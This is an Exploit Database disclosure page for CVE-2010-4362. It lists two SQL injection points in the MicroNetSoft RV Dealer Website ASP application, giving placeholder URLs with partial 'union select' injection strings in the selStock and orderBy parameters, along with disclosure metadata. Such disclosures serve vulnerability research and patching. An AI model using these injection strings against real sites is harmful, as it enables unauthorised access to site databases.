Exploit Database - Logo

MicroNetSoft RV Dealer Website - search.asp / showAlllistings.asp SQL Injection

EDB-ID: 15629 Author: underground-stockholm.com Published: 2010-11-29
CVE: CVE-2010-4362 Type: Webapps Platform: ASP
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities
PRODUCT: MicroNetSoft RV Dealer Website
PRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/

SQL INJECTION BUGS:

http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta
http://[host]/[path]/showAlllistings.asp?orderBy=union

Related Exploits

Trying to match CVEs (1): CVE-2010-4362
Trying to match OSVDBs (2): 69580, 69581
Other Possible E-DB Search Terms: MicroNetSoft RV Dealer Website
Date D V Title Author
2010-09-06Download Exploit Code Verified Micronetsoft RV Dealer Website - SQL InjectionL0rd CrusAd3r
Menu